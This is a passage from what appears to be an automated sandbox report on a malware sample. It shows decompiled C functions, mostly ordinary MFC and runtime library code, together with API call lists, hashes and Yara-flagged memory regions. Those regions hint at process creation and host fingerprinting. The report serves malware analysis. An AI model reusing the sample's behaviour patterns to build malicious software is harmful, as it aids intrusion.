                  						if(_t21 != 0) {
                  							GlobalUnlock(_t21);
                  						}
                  						_t17 = _t25;
                  					} else {
                  						_t17 = 0;
                  					}
                  					return _t17;
                  				}
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalLock
                  • String ID:
                  • API String ID: 2848605275-0
                  • Opcode ID: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction ID: 2c7e1155eccb6f0b88d5b3aa029337c93f042f81e7a86a2626123610b555cf53
                  • Opcode Fuzzy Hash: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction Fuzzy Hash: 8E01D132300635ABC7215B6AEC44A377EDCEF887B1B544422BD49C3600D638CC30D6A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004088DE(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t9;
                  				int _t11;
                  				void* _t13;
                  				void* _t18;
                  				void* _t26;
                  
                  				_t26 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
                  					_t11 = PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3);
                  					_t18 = PostMessageA;
                  					if(_t11 == 0) {
                  						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
                  					}
                  					if(GetCapture() ==  *(_t26 + 0x20)) {
                  						ReleaseCapture();
                  					}
                  					_t13 = E0040F8D7(_t26);
                  					_t30 = _t13;
                  					if(_t13 == 0) {
                  						_t13 = E00406436(_t18, 0, 0x367, _t26, _t30);
                  					}
                  					 *((intOrPtr*)(_t26 + 0x68)) = 0;
                  					 *((intOrPtr*)(_t13 + 0x68)) = 0;
                  					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
                  				}
                  				return _t9;
                  			}














                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction ID: 57fe4fcd219db2e76da600668b61a162516832e2059398302be7d6c9e2b70dbe
                  • Opcode Fuzzy Hash: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction Fuzzy Hash: 8A0167755006007FE7257B66DC59F2B7ABDFB85718F10493DF182A22E1EA74EC00C669
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420BAF(long* __ecx) {
                  				intOrPtr _t4;
                  				long _t5;
                  				void* _t6;
                  				void* _t13;
                  				intOrPtr _t14;
                  				long* _t15;
                  
                  				_t15 = __ecx;
                  				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                  				if(_t4 != 0) {
                  					do {
                  						_t14 =  *((intOrPtr*)(_t4 + 4));
                  						E004209F9(__ecx, _t4, 0);
                  						_t4 = _t14;
                  					} while (_t14 != 0);
                  				}
                  				_t5 =  *_t15;
                  				if(_t5 != 0xffffffff) {
                  					TlsFree(_t5);
                  				}
                  				_t6 = _t15[4];
                  				if(_t6 != 0) {
                  					_t13 = GlobalHandle(_t6);
                  					GlobalUnlock(_t13);
                  					_t6 = GlobalFree(_t13);
                  				}
                  				DeleteCriticalSection( &(_t15[7]));
                  				return _t6;
                  			}










                  APIs
                  • TlsFree.KERNEL32(?,?,?,00420C15), ref: 00420BD7
                  • GlobalHandle.KERNEL32 ref: 00420BE5
                  • GlobalUnlock.KERNEL32(00000000,?,?,00420C15), ref: 00420BEE
                  • GlobalFree.KERNEL32 ref: 00420BF5
                  • DeleteCriticalSection.KERNEL32(?,?,?,00420C15), ref: 00420BFF
                    • Part of subcall function 004209F9: EnterCriticalSection.KERNEL32(00466584,?,00466568,00466584,00466568,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                    • Part of subcall function 004209F9: LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                    • Part of subcall function 004209F9: LocalFree.KERNEL32(?,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                    • Part of subcall function 004209F9: TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction ID: 3e9e6558ba584311e6215c2e42c48fddda6ce4580923e77d2502095fd869f7fc
                  • Opcode Fuzzy Hash: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction Fuzzy Hash: 10F0903A3002205BD3215B6ABC4CE1B3AE9BF867643550669F955D3252CB64EC028668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042CD27(void* __ecx) {
                  				int _v8;
                  
                  				_push(__ecx);
                  				_v8 = SaveDC( *(__ecx + 8));
                  				if( *(__ecx + 4) == 0) {
                  					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
                  				} else {
                  					SelectObject( *(__ecx + 4), GetStockObject(0xd));
                  					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _v8;
                  					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
                  				}
                  				return _v8;
                  			}





                  APIs
                  • SaveDC.GDI32(?), ref: 0042CD3A
                  • GetStockObject.GDI32(0000000D), ref: 0042CD48
                  • SelectObject.GDI32(00000000,00000000), ref: 0042CD58
                  • SaveDC.GDI32(00000000), ref: 0042CD5D
                  • SelectObject.GDI32(00000000,?), ref: 0042CD6B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$SaveSelect$Stock
                  • String ID:
                  • API String ID: 2785865535-0
                  • Opcode ID: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction ID: d072d42024ffe69d130f0e67522b41d9a784e59db6b74b44c5ac60acea8468f4
                  • Opcode Fuzzy Hash: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction Fuzzy Hash: BCF06D35500A14EFC7219FA6DD48D1BBBF5FB85710B104839E14652520C771FD05DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0041C322(void* __ebx, int __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t91;
                  				intOrPtr _t95;
                  				signed short _t97;
                  				signed short _t98;
                  				signed short _t101;
                  				signed short _t103;
                  				signed short _t108;
                  				signed short _t114;
                  				signed int* _t118;
                  				signed short _t132;
                  				signed short _t135;
                  				signed short _t139;
                  				signed short _t140;
                  				signed short _t162;
                  				intOrPtr* _t167;
                  				signed short _t178;
                  				signed short _t192;
                  				intOrPtr* _t196;
                  				int _t198;
                  				intOrPtr* _t199;
                  				void* _t200;
                  
                  				_push(0x3c);
                  				E00431A9B(E0044B99F, __ebx, __edi, __esi);
                  				_t198 = __ecx;
                  				 *(_t200 - 0x10) = __ecx;
                  				_t196 = E0040F898(__ecx);
                  				_t91 = E0041E9BB(0x44ff98, _t196);
                  				_t202 = _t91;
                  				if(_t91 == 0) {
                  					_t196 = E00403AA0();
                  				}
                  				E00404A80(_t200 - 0x48);
                  				 *((intOrPtr*)(_t200 - 0x38)) = _t196;
                  				 *((intOrPtr*)(_t200 - 0x44)) =  *((intOrPtr*)(_t198 + 0x54));
                  				 *((intOrPtr*)(_t200 - 0x3c)) = _t198;
                  				_t199 = E0041E928( *(_t200 + 0x10), _t202);
                  				if(_t199 != 0) {
                  					_t95 =  *((intOrPtr*)(_t200 + 0x14));
                  					 *((intOrPtr*)(_t199 + 0xa8)) = _t95;
                  					 *((intOrPtr*)( *_t196 + 0x168))(1, _t95);
                  					_t97 = E00404461(__eflags, 0xa8);
                  					 *(_t200 + 0x10) = _t97;
                  					 *(_t200 - 4) = 0;
                  					__eflags = _t97;
                  					if(__eflags == 0) {
                  						_t98 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t98 = E0042DDDF(_t97, __eflags);
                  					}
                  					 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
                  					 *(_t199 + 0xac) = _t98;
                  					_t101 = E0041E9BB("�IE",  *((intOrPtr*)( *_t196 + 0x148))());
                  					 *(_t200 + 0x10) = _t101;
                  					__eflags = _t101;
                  					if(_t101 == 0) {
                  						_t191 =  *(_t200 + 8) & 0x0000ffff;
                  						_t103 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))(_t196,  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
                  						__eflags = _t103;
                  						if(_t103 == 0) {
                  							goto L9;
                  						}
                  						 *( *(_t199 + 0xac) + 0x58) = 1;
                  						goto L25;
                  					} else {
                  						_t132 = E0041E9BB(0x4549cc,  *((intOrPtr*)( *(_t200 - 0x10) + 0x54)));
                  						 *(_t200 - 0x14) = _t132;
                  						__eflags = _t132;
                  						if(_t132 != 0) {
                  							_t178 =  *(_t200 + 0x10);
                  							_t192 =  *(_t178 + 0x10c);
                  							 *(_t200 - 0x10) = _t192;
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								 *(_t200 - 0x10) =  *(_t178 + 0x108);
                  							}
                  							 *((intOrPtr*)( *_t132 + 0x110))(0);
                  							__eflags =  *(_t200 - 0x10);
                  							if( *(_t200 - 0x10) == 0) {
                  								goto L9;
                  							} else {
                  								_t191 =  *(_t200 + 8) & 0x0000ffff;
                  								_t135 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))( *(_t200 - 0x10),  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
                  								__eflags = _t135;
                  								if(_t135 == 0) {
                  									goto L9;
                  								}
                  								 *( *(_t199 + 0xac) + 0x58) = 1;
                  								E00420CB9( *(_t199 + 0xac),  *(_t200 + 0x10));
                  								 *(_t200 - 0x10) = 0;
                  								 *(_t200 + 8) = 0;
                  								 *(_t200 - 4) = 1;
                  								_t139 = E0041B4D2( *(_t200 + 0x10), _t200 + 8);
                  								__eflags = _t139;
                  								if(_t139 < 0) {
                  									E0041B4A1( *(_t200 + 0x10), _t200 + 8);
                  									 *(_t200 - 0x10) = 1;
                  								}
                  								_t140 =  *(_t200 + 8);
                  								__eflags = _t140;
                  								if(_t140 != 0) {
                  									 *((intOrPtr*)( *_t140 + 0x14))(_t140, _t200 - 0x34);
                  									_t191 = _t200 - 0x34;
                  									 *((intOrPtr*)( *( *(_t200 - 0x14)) + 0x12c))(_t200 - 0x34,  *(_t200 + 8),  *(_t200 - 0x10));
                  									_t140 =  *(_t200 + 8);
                  								}
                  								 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
                  								 *( *(_t200 + 0x10) + 0x154) = 1;
                  								__eflags = _t140;
                  								if(_t140 != 0) {
                  									 *((intOrPtr*)( *_t140 + 8))(_t140);
                  								}
                  								L25:
                  								 *((intOrPtr*)(_t200 - 0x24)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x20)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x1c)) = 0;
                  								 *((intOrPtr*)(_t200 - 0x18)) = 0;
                  								_t114 =  *((intOrPtr*)( *_t199 + 0x54))(0, 0, 0x50800000, _t200 - 0x24, _t196, 0xe900, _t200 - 0x48);
                  								_t167 = _t196;
                  								__eflags = _t114;
                  								if(_t114 != 0) {
                  									 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x14)) + 0xc)) = E0040835B(_t167);
                  									_t118 = E0040835B( *((intOrPtr*)( *_t196 + 0x148))());
                  									__eflags = _t118;
                  									if(__eflags != 0) {
                  										_t191 =  *_t118;
                  										 *((intOrPtr*)( *_t118 + 0x168))(0, _t118, _t118);
                  									}
                  									__eflags = E0041BD1E(0, _t199, _t191, _t196, _t199, __eflags,  *((intOrPtr*)(_t200 + 0xc)));
                  									if(__eflags != 0) {
                  										E00408362(_t196, _t199, 1);
                  										SendMessageA( *( *(_t199 + 0xac) + 0x20), 0x363, 1, 0);
                  										 *((intOrPtr*)( *_t196 + 0x150))(1);
                  										UpdateWindow( *(_t196 + 0x20));
                  									} else {
                  										E0041B668(_t199, __eflags);
                  									}
                  									_t108 = 1;
                  									__eflags = 1;
                  									goto L33;
                  								}
                  								 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
                  								L12:
                  								 *((intOrPtr*)(_t199 + 0xa8)) = 0;
                  								 *((intOrPtr*)( *_t199 + 4))(1);
                  								goto L3;
                  							}
                  						}
                  						L9:
                  						 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
                  						_t162 =  *(_t199 + 0xac);
                  						__eflags = _t162;
                  						if(_t162 != 0) {
                  							 *((intOrPtr*)( *_t162 + 4))(1);
                  						}
                  						 *(_t199 + 0xac) = 0;
                  						goto L12;
                  					}
                  				} else {
                  					L3:
                  					_t108 = 0;
                  					L33:
                  					return E00431B73(_t108);
                  				}
                  			}

























                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C329
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • SendMessageA.USER32(?,00000363,00000001,00000000), ref: 0041C5E4
                  • UpdateWindow.USER32(?), ref: 0041C5F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSendUpdateWindow_malloc
                  • String ID: IE
                  • API String ID: 291802051-3275544015
                  • Opcode ID: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction ID: d0b6d8a432cfeddc55617652b4a4c4f0c68d15cc15fa885d4595bbb90d12322d
                  • Opcode Fuzzy Hash: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction Fuzzy Hash: 7A917C70600215EFCB04DFA5C888AEEB7B5FF48304F20852EF8569B391DB79A981CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA558
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ,"E$$DKM]$g{2=
                  • API String ID: 1029625771-544385820
                  • Opcode ID: 47e33a7a0c286bf7f60103329fa84ea8ca0cdba379a8828e1e74b28630b792aa
                  • Instruction ID: db7d75899644433ff456f4a317d3461e35c9eca4d7e7a7a45790d753e3663fab
                  • Opcode Fuzzy Hash: 47e33a7a0c286bf7f60103329fa84ea8ca0cdba379a8828e1e74b28630b792aa
                  • Instruction Fuzzy Hash: 0751C8B4C4536DCBEB20DF969A81B8DBB71FB01304F608699C5693B315DB700A86CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetComputerNameW.KERNEL32(?,?), ref: 023ED179
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 023ED1A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide
                  • String ID: 494126_D1A8F11D$X
                  • API String ID: 4013585866-2529105192
                  • Opcode ID: 516543abb59b67773448a3e45c91e25de301463041cc1159f8e9feb3fcfce9a4
                  • Instruction ID: 2d48876fe643f95c6c6b9b32050273eb2813ee910b0475dff55be163c5dec98c
                  • Opcode Fuzzy Hash: 516543abb59b67773448a3e45c91e25de301463041cc1159f8e9feb3fcfce9a4
                  • Instruction Fuzzy Hash: E4118071D4112DAADF60D6A89D04BEF777DAF09304F100006EE47F61C0EB604A0F87A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: f11a84c4d114192b81c9d2f198761c1e25a75ba4763b5f1f971499e194803e8b
                  • Instruction ID: 047c1d937ae0e327e404fc4315923c7ad2eb256ddb3926fcf2cc30b3dcf7fba9
                  • Opcode Fuzzy Hash: f11a84c4d114192b81c9d2f198761c1e25a75ba4763b5f1f971499e194803e8b
                  • Instruction Fuzzy Hash: B3F0C872900118ABDF11DEA5EC04AFFB7BEEF45311F104426EE1BE6184EB709D08C690
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E004103CD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				struct HINSTANCE__* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t25;
                  				void* _t26;
                  				void* _t27;
                  
                  				_t27 = __eflags;
                  				_t24 = __edi;
                  				_t21 = __ebx;
                  				E00424385(0xc);
                  				_push(E0040F587);
                  				_t26 = E004205C8(__ebx, 0x4664a8, __edi, _t25, _t27);
                  				_t28 = _t26;
                  				if(_t26 == 0) {
                  					E00406436(__ebx, 0x4664a8, __edi, _t26, _t28);
                  				}
                  				_t29 =  *(_t26 + 8);
                  				if( *(_t26 + 8) != 0) {
                  					L7:
                  					E004243F7(0xc);
                  					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
                  				} else {
                  					_push("hhctrl.ocx");
                  					_t16 = E0040D5D6(_t21, 0x4664a8, _t24, _t26, _t29);
                  					 *(_t26 + 4) = _t16;
                  					if(_t16 != 0) {
                  						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                  						 *(_t26 + 8) = _t17;
                  						__eflags = _t17;
                  						if(_t17 != 0) {
                  							goto L7;
                  						}
                  						FreeLibrary( *(_t26 + 4));
                  						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                  					}
                  					return 0;
                  				}
                  			}











                  APIs
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                    • Part of subcall function 00424385: InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                    • Part of subcall function 00424385: LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 004205C8: __EH_prolog3_catch.LIBCMT ref: 004205CF
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00410416
                  • FreeLibrary.KERNEL32(?), ref: 00410426
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpA$hhctrl.ocx
                  • API String ID: 2853499158-63838506
                  • Opcode ID: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction ID: 2d4502df0f2be6acf12af82616466bd765ca29f1fd83309a5bbf0ced49f2de9c
                  • Opcode Fuzzy Hash: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction Fuzzy Hash: C101DF31240716BBDB216F62ED05B9B3A90EF00725F50C42BFD4AA6592DBB8D8D0C62D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrcpyW.KERNEL32(?,023F2C18), ref: 023ED5B3
                  • lstrlenW.KERNEL32(?,?,023ED6D9,?,000CD140), ref: 023ED5BA
                  • GetTickCount.KERNEL32 ref: 023ED5CA
                    • Part of subcall function 023E1E8F: GetTickCount.KERNEL32 ref: 023E1EA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\SysWOW64
                  • API String ID: 1913473829-2716745322
                  • Opcode ID: 1efb3f716250f4cfb6783dda61b1f53c0a0603152a7f04d6eadb75d2c36462a3
                  • Instruction ID: 694da0c8f376bdf41d5f9e128769e8ed98ccc728c32884166d96641e58a28ca3
                  • Opcode Fuzzy Hash: 1efb3f716250f4cfb6783dda61b1f53c0a0603152a7f04d6eadb75d2c36462a3
                  • Instruction Fuzzy Hash: C4F02B636583046BE7245FE4FC89A523365EF84721F14D4B6E909DF296EBB4C84487E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E0043E7E7() {
                  				signed long long _v12;
                  				signed int _v20;
                  				signed long long _v28;
                  				signed char _t8;
                  
                  				_t8 = GetModuleHandleA("KERNEL32");
                  				if(_t8 == 0) {
                  					L6:
                  					_v20 =  *0x456108;
                  					_v28 =  *0x456100;
                  					asm("fsubr qword [ebp-0x18]");
                  					_v12 = _v28 / _v20 * _v20;
                  					asm("fld1");
                  					asm("fcomp qword [ebp-0x8]");
                  					asm("fnstsw ax");
                  					if((_t8 & 0x00000005) != 0) {
                  						return 0;
                  					} else {
                  						return 1;
                  					}
                  				} else {
                  					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                  					if(__eax == 0) {
                  						goto L6;
                  					} else {
                  						_push(0);
                  						return __eax;
                  					}
                  				}
                  			}








                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,00434742), ref: 0043E7EC
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043E7FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction ID: 47c6caf6fecddeb87b6d1ac5e622b5b37c24e015e1786739191dd9ee142ae4fe
                  • Opcode Fuzzy Hash: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction Fuzzy Hash: 5CF03030A00A09E2DF002BB6BC0E76F7A74BB84747FA204A1E591B11D6DF35C475D25A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004391D4(intOrPtr* __eax, intOrPtr __edi) {
                  				intOrPtr _t10;
                  				intOrPtr* _t12;
                  
                  				_t10 = __edi;
                  				if(__edi == 0 || __eax == 0) {
                  					return 0;
                  				} else {
                  					_t12 =  *__eax;
                  					if(_t12 != __edi) {
                  						 *__eax = __edi;
                  						E00439086(__edi);
                  						if(_t12 != 0) {
                  							E00439115(_t12);
                  							if( *_t12 == 0 && _t12 != 0x463b50) {
                  								E00438F3D(_t12);
                  							}
                  						}
                  					}
                  					return _t10;
                  				}
                  			}






                  APIs
                  • ___addlocaleref.LIBCMT ref: 004391E6
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 00439098
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390A5
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390B2
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390BF
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390CC
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390E8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(8BF4428D), ref: 004390F8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 0043910E
                  • ___removelocaleref.LIBCMT ref: 004391F1
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043912F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043913C
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439149
